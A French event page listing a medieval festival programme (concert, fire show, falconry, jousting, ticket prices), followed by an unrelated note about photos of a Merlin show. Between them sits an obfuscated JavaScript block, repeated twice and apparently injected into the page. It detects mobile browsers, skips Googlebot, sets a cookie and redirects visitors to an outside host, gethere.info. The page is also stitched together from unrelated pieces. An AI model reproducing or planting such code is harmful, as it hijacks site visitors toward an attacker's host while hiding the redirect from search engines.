« Noble dame » ou l’évocation de la femme à travers la musique médiéval.  Dans ce programme l’ensemble «Mille Bonjours» propose une interprétation de pièces profanes et religieuses des 13ème et 14ème siècles évoquant la féminité. 

L’occasion également de découvrir la beauté d’instruments rares et anciens  tels que l’organetto, le tamburello, la cornemuse à anche simple   et double, la harpe, la flûte tambourine …

22h15: Spectacle de feu   Place de la République : Un spectacle de feu entre performance, danse et poésie

 

Moins de 12 ans : Gratuit                       

Adultes : 10E

Groupes (+de 10 Pers.),Adultes costumés & Adhérents 3F.S.H             :  8E      

 

Dimanche 19 août dans la citadelle de 10h00 à 19h00 (entrée payante)

Campements militaires et civils. Archerie et arbalestrie  médiévale. Démonstration de combats, adoubement des enfants. Torture, Mise au pilori… Cracheur de feu, échassiers …tout ceci autour d’un marché médiéval où vous verrez aussi : calligraphe, monnayeur, enlumineur, graveur, sculpteur d’argile, herboriste, haubergier, potier…

Ars Musica : découverte ludique et participative des musiques et instruments du moyen âge

Spectacle de rue Mandingfoliii : Percussions et arts du cirque  

Fabliaux:  Estula, Brunain, la vache au prêtre, les aveugles de compiègne, la farce de maître pathelin…

Démonstration de tir à l’arbalète

Démonstration de dressage haute école  Présenté par la princesse Eléonore, suivi des écuyers qui exécutent  voltige cosaque, poste hongroise ….

Volerie de rapaces : Fauconnerie traditionnelle à pieds, séquence de vol et présentation au poing…

Les jeux médiévaux : affrontement de quatre cavaliers soutenus par leurs publics respectifs dans des jeux historiques tels : le jeu des écus, le jeu des anneaux, la cible…

Volerie de rapaces à cheval Présentation des rapaces, séquences de vol, mise en avant de la complicité existant entre dresseurs et animaux

Tournoi de chevalerie   4 cavaliers s’affrontent en joutes courtoises, suivies de combats à pieds

 

Moins de 8ans : Gratuit      

Jusqu’à 16 ans             :   6E    

Adultes : 10E    

Groupes (+de 10 Pers.), Adultes  costumés &  Adhérents  3F.S. H : 8E

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

SPECTACLE LA LEGENDE DE MERLIN

dimanche 8 janvier 2012

BONJOUR
LES PHOTOS DU SPECTACLE LA LEGENDE DE MERLIN AU STADE COUVERT DE LIEVIN
SONT SUR MON SITE
photosspectacles.free.fr